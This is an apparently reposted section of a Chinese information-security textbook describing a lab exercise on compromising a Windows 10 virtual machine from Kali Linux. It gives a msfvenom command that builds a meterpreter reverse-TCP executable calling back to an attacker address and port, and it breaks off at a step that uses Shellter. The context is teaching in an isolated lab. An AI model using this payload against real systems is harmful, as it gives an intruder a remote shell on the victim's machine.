1. 程式人生 > 其它 >資訊保安技術實用教程-第4版---張同光---ISBN-9787121423031---4.4例項——入侵Windows10

資訊保安技術實用教程-第4版---張同光---ISBN-9787121423031---4.4例項——入侵Windows10

資訊保安技術實用教程-第4版---張同光---ISBN-9787121423031---4.4例項——入侵Windows10

https://www.cnblogs.com/ztguang/p/12828764.html

主 編: 張同光

ISBN號: 978-7-121-42303-1 9787121423031
出版日期: 2021-11-20
出版社: 電子工業出版社

頁碼: 定價:¥69.80元


4.4例項——入侵Windows10

1.實驗環境

實驗環境如4.1所示使用2個虛擬機器(Windows10_1703_x86_enKaliLinux和宿主機(Windows 10),2個虛擬機器的網路連線方式選擇“僅主機(Host-

Only)網路”宿主機和2個虛擬機器的IP地址、三個系統之間的網路連通性4.2所示兩個虛擬機器分別Kali Linux 2020Windows 10Windows 10 1703作為被滲透的目標機,Kali Linux作為攻擊機。

4.1實驗環境

4.2三個系統的IP地址及其之間的網路連通性

2入侵過程

1步:執行msfvenom命令

4.3所示Kali Linux終端視窗中執行如下命令

msfvenom -p windows/meterpreter/reverse_tcp -a x86 platform windows -f exe LHOST=192.168.56.101 LPORT=4444 -o /root/kali2win10.exe

上面msfvenom命令生成32Windows可執行檔案kali2win10.exe,該檔案實現反向TCP連線必須指定為.exe型別,並且必須定義本地主機(LHOST)和本地埠(LPORT)。該例項中LHOST是攻擊機的IP地址,LPORT是一個埠,一旦目標機受到攻擊,它就會監聽目標機的連線。

4.3執行msfvenom命令

2步:下載並執行Shellter